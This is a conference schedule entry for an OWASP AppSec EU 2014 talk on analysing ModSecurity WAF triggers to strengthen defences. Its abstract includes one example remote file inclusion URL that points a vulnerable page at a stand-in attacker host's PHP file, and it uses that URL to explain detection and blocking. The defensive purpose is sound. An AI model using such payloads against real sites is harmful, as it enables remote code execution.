Loading…
AppSec Europe 2014 has ended
Welcome to the full schedule of the OWASP AppSec Research EU 2014 conference days

Sign up or log in to bookmark your favorites and sync them to your phone or calendar.

Wednesday, June 25
 

15:55 BST

Getting New Actionable Insights by Analyzing Web Application Firewall Triggers
ModSecurity Web Application Firewall was first released more than a decade ago, available as open source software that gives the ability to protect web applications. Over the years ModSecurity has matured significantly, and is the most widely deployed WAF, protecting millions of websites. A long side ModSecurity engine we can also find OWASP ModSecurity Core Rule Set (CRS), which is a library of generic application security signatures that provide a base level of protection for any web application.

In this presentation I will show an advanced technique for post processing of ModSecurity Core Rule Set WAF triggers in order to generate actionable defenses that are derived from WAF triggers. The objective of the post processing is to improve security controls. Based on the collected malicious HTTP traffic we can produce new insights on our attackers and the techniques they use and as a result we can harden defenses that will improve our mitigations.

The presentation will include detailed description of several techniques with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).

Example for analysis on remote file inclusion attack:

When analyzing the payload of a remote file inclusion attack we will find a link to a remote source code file the attackers are trying to inject into the vulnerable application.
The injected remote source file is in many cases a static "anchor" in a continues attack campaign that uses various RFI vulnerabilities with the same remote file.

Generating signature that matches attacks based on the attack "anchor" can improve the detection capabilities for ModSecurity CRS and at the same time give better insight on the threat landscape.
More than that, this "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.

RFI attack:

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous.php

In the attack above we can see remote source file located on “www.attacker.com/malicous.php”, using this malicious file can be valuable when:



  • Looking for the same link on HTTP traffic (complementary to ModSecurity CRS rules)



  • Blocking traffic from within the organization to the attacker web application



  • Correlating similar attacks as same distributed attack campaign 



Speakers
avatar for Or Katz

Or Katz

Principal Lead, Security Researcher, Akamai
Or Katz is a security veteran, with years of experience at industry leading vendors, currently serves as Principal Lead Security Researcher for Akamai. Katz is a frequent Speaker in security conferences and published several articles and white papers on threat intelligence and defensive... Read More →


Wednesday June 25, 2014 15:55 - 16:45 BST
LAB003